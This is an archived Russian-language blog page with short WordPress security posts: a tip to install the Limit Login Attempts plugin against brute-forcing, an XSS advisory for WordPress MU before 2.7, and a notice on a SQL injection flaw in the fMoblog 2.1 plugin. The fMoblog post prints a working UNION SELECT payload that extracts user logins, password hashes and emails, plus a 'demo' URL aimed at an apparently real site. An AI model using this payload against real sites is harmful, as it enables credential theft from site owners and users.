Archive for Март, 2009
Защита от перебора паролей в WordPress
Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время. Сделать это можно очень легко, достаточно просто скачать и установить WordPress плагин Limit Login Attempts. читать далее ..
Уязвимость WordPress плагина fMoblog 2.1
Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id». Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group _concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость в WordPress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для устранения уязвимости рекомендуется обновить WordPress MU до версии 2.7 Подробности.
